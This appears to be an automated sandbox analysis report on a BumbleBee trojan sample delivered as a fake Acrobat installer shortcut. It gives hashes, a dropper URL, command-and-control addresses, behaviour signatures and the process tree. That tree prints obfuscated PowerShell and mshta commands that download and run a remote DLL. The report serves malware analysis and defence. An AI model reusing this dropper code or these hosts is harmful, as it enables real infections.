bumblebee | 48d585ca3a477ef7e8f0983735903335d9a5327f5fc434c222b6f551f7c0dc68

General

Target

AcrobatInstaller.lnk
Size

1KB
MD5

f115333f8c6d19a22743ad549019db28
SHA1

e00bbf362c53f58af8b66dedbd44e84a46c97411
SHA256

48d585ca3a477ef7e8f0983735903335d9a5327f5fc434c222b6f551f7c0dc68
SHA512

ff7e372b39c7829e6303eaa642a3b36a45f5eeadfcb832bd692a0b14c5d67b108161c0826d8d475a8c6d595f5199e95e39d697d245a90e486ff191b369d7c90a

Score

10^/10

bumblebee 1011t1 trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://cruds-club.com/AcrobatInstaller.hta

Extracted

Family

bumblebee

Botnet

1011t1

C2

64.44.135.140:443

103.144.139.150:443

146.70.149.43:443

rc4.plain

Signatures

BumbleBee
BumbleBee is a webshell malware written in C++.
trojan bumblebee

Blocklisted process makes network request 17 IoCs

flow	pid	Process
7	4268	mshta.exe
9	4268	mshta.exe
11	4268	mshta.exe
12	4336	powershell.exe
22	4308	rundll32.exe
27	4308	rundll32.exe
30	4308	rundll32.exe
32	4308	rundll32.exe
37	4308	rundll32.exe
38	4308	rundll32.exe
40	4308	rundll32.exe
41	4308	rundll32.exe
42	4308	rundll32.exe
44	4308	rundll32.exe
45	4308	rundll32.exe
48	4308	rundll32.exe
49	4308	rundll32.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Control Panel\International\Geo\Nation	mshta.exe

Loads dropped DLL 1 IoCs

pid	Process
4308	rundll32.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
4308	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1912	powershell.exe
1912	powershell.exe
4336	powershell.exe
4336	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	4336	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2024 wrote to memory of 1912	2024	cmd.exe	83
PID 2024 wrote to memory of 1912	2024	cmd.exe	83
PID 1912 wrote to memory of 4268	1912	powershell.exe	84
PID 1912 wrote to memory of 4268	1912	powershell.exe	84
PID 4268 wrote to memory of 4336	4268	mshta.exe	85
PID 4268 wrote to memory of 4336	4268	mshta.exe	85
PID 4336 wrote to memory of 4308	4336	powershell.exe	87
PID 4336 wrote to memory of 4308	4336	powershell.exe	87

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\AcrobatInstaller.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\?i*\S*3?\m*ta.e* ('https://cruds-club.com/AcrobatInstaller' + '.h' + 'ta')
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1912
- - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" https://cruds-club.com/AcrobatInstaller.hta
    3⤵
    - Blocklisted process makes network request
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4268
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function MWG($Fii, $erX){[IO.File]::WriteAllBytes($Fii, $erX)};function LaM($Fii){if($Fii.EndsWith((HQD @(6236,6290,6298,6298))) -eq $True){rundll32.exe $Fii , mruAlloc }elseif($Fii.EndsWith((HQD @(6236,6302,6305,6239))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Fii}elseif($Fii.EndsWith((HQD @(6236,6299,6305,6295))) -eq $True){misexec /qn /i $Fii}else{Start-Process $Fii}};function NRU($eMW){$QMX = New-Object (HQD @(6268,6291,6306,6236,6277,6291,6288,6257,6298,6295,6291,6300,6306));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$erX = $QMX.DownloadData($eMW);return $erX};function HQD($vfw){$ZTq=6190;$ViK=$Null;foreach($aFd in $vfw){$ViK+=[char]($aFd-$ZTq)};return $ViK};function Xxb(){$Bpm = $env:AppData + '\';;;$WbktydWSz = $Bpm + '1011t1_cr1.dll'; if (Test-Path -Path $WbktydWSz){LaM $WbktydWSz;}Else{ $jPzXrDoPH = NRU (HQD @(6294,6306,6306,6302,6305,6248,6237,6237,6289,6304,6307,6290,6305,6235,6289,6298,6307,6288,6236,6289,6301,6299,6237,6239,6238,6239,6239,6306,6239,6285,6289,6304,6239,6236,6290,6298,6298));MWG $WbktydWSz $jPzXrDoPH;LaM $WbktydWSz;};;}Xxb;
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4336
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll mruAlloc
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious use of NtCreateThreadExHideFromDebugger
        
        PID:4308

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll

Filesize
830KB

MD5
19f8c4fb6b729f856173beba2b8cfc1d

SHA1
37faae961fa1ca194a2d29a5ac4958e91f0c4c9c

SHA256
ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9

SHA512
4e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308

Download Submit
C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll

Filesize
830KB

MD5
19f8c4fb6b729f856173beba2b8cfc1d

SHA1
37faae961fa1ca194a2d29a5ac4958e91f0c4c9c

SHA256
ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9

SHA512
4e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308

Download Submit
memory/1912-135-0x00007FFA52B40000-0x00007FFA53601000-memory.dmp

Filesize
10.8MB

Download
memory/1912-133-0x00000253FD350000-0x00000253FD372000-memory.dmp

Filesize
136KB

Download
memory/4308-145-0x00000245C8900000-0x00000245C8A49000-memory.dmp

Filesize
1.3MB

Download
memory/4308-146-0x00000245C8730000-0x00000245C87A3000-memory.dmp

Filesize
460KB

Download
memory/4336-140-0x00007FFA522C0000-0x00007FFA52D81000-memory.dmp

Filesize
10.8MB

Download
memory/4336-144-0x00007FFA522C0000-0x00007FFA52D81000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads